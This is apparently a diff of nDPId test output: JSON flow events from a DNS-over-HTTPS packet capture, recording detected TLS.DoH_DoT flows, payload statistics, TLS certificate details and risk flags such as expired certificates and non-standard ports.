-00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946739317842,"flow_last_seen":946739327879,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5992,"flow_avg_l4_payload_len":399,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":60026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739402059,"flow_last_seen":946739432187,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":6475,"flow_avg_l4_payload_len":380,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.54","src_port":57058,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739354159,"flow_last_seen":946739364932,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3114,"flow_tot_l4_payload_len":5263,"flow_avg_l4_payload_len":328,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739380697,"flow_last_seen":946739410804,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2838,"flow_tot_l4_payload_len":5244,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"1.0.0.1","src_port":53802,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739400581,"flow_last_seen":946739430677,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5345,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.70.85.11","src_port":54164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739400294,"flow_last_seen":946739430460,"flow_idle_time":7580000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5037,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"146.255.56.98","src_port":43718,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":946739661512,"flow_last_seen":946739691599,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3114,"flow_tot_l4_payload_len":4770,"flow_avg_l4_payload_len":366,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44704,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739374011,"flow_last_seen":946739404206,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3125,"flow_tot_l4_payload_len":5512,"flow_avg_l4_payload_len":324,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.202.176.26","src_port":43106,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739311335,"flow_last_seen":946739327906,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1562,"flow_tot_l4_payload_len":5128,"flow_avg_l4_payload_len":301,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51770,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":946739603327,"flow_last_seen":946739633413,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3014,"flow_tot_l4_payload_len":4605,"flow_avg_l4_payload_len":383,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51846,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739401864,"flow_last_seen":946739432023,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":6872,"flow_avg_l4_payload_len":381,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"95.216.229.153","src_port":43888,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739311703,"flow_last_seen":946739327879,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5538,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":52386,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":946739378281,"flow_last_seen":946739408545,"flow_idle_time":7580000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6534,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":59026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739385090,"flow_last_seen":946739415188,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3116,"flow_tot_l4_payload_len":5274,"flow_avg_l4_payload_len":329,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"136.144.215.158","src_port":52176,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":946739380870,"flow_last_seen":946739411017,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4647,"flow_avg_l4_payload_len":221,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.90.28.0","src_port":33338,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946739298533,"flow_last_seen":946739298798,"flow_idle_time":7580000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":3077,"flow_avg_l4_payload_len":769,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946739299058,"flow_last_seen":946739299326,"flow_idle_time":7580000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":3075,"flow_avg_l4_payload_len":768,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53676,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":946739348407,"flow_last_seen":946739365024,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3098,"flow_tot_l4_payload_len":5364,"flow_avg_l4_payload_len":282,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":36012,"dst_port":453,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00820{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":946739310588,"flow_last_seen":946739327990,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3100,"flow_tot_l4_payload_len":5402,"flow_avg_l4_payload_len":270,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":37530,"dst_port":453,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":946739304432,"flow_last_seen":946739327879,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":8183,"flow_avg_l4_payload_len":272,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.95.218.42","src_port":50614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739385216,"flow_last_seen":946739415379,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4699,"flow_avg_l4_payload_len":261,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.0.106","src_port":39214,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946739348961,"flow_last_seen":946739364914,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5460,"flow_avg_l4_payload_len":364,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":38018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739305016,"flow_last_seen":946739327879,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5516,"flow_avg_l4_payload_len":324,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":59404,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +01301{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":566,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":946739879619,"flow_last_seen":946739879647,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":3817,"flow_avg_l4_payload_len":1272,"midstream":1,"thread_ts_msec":946739879647,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","server_names":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"2464432ec440b95b36263230c3148d11","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=jarjar.meganerd.nl","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"17:C9:8C:F5:DD:1F:0E:0F:DC:C5:42:4F:ED:C4:CD:57:5A:5D:7A:4F"}} +00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739400702,"flow_last_seen":946739407673,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":5567,"flow_avg_l4_payload_len":309,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":946739312203,"flow_last_seen":946739327905,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":5116,"flow_avg_l4_payload_len":232,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.203.179.248","src_port":41720,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":946739879619,"flow_last_seen":946739888204,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":4885,"flow_avg_l4_payload_len":348,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":946739389936,"flow_last_seen":946739420902,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":6677,"flow_avg_l4_payload_len":333,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52028,"dst_port":8443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739390933,"flow_last_seen":946739421078,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3111,"flow_tot_l4_payload_len":5324,"flow_avg_l4_payload_len":332,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"217.169.20.23","src_port":34036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739311566,"flow_last_seen":946739327918,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":6429,"flow_avg_l4_payload_len":378,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55322,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946739336955,"flow_last_seen":946739364937,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5781,"flow_avg_l4_payload_len":385,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.233.106.232","src_port":46658,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739378577,"flow_last_seen":946739410674,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2503,"flow_tot_l4_payload_len":5076,"flow_avg_l4_payload_len":282,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.28.34","src_port":33724,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739305650,"flow_last_seen":946739328075,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2194,"flow_tot_l4_payload_len":5876,"flow_avg_l4_payload_len":367,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":40938,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739304846,"flow_last_seen":946739327879,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3131,"flow_tot_l4_payload_len":6025,"flow_avg_l4_payload_len":354,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.147.50","src_port":55962,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":946739310980,"flow_last_seen":946739321153,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":3003,"flow_tot_l4_payload_len":5652,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.43.135.1","src_port":38186,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946739317842,"flow_last_seen":946739327879,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5992,"flow_avg_l4_payload_len":399,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":60026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739402059,"flow_last_seen":946739432187,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":6475,"flow_avg_l4_payload_len":380,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.54","src_port":57058,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739354159,"flow_last_seen":946739364932,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3114,"flow_tot_l4_payload_len":5263,"flow_avg_l4_payload_len":328,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 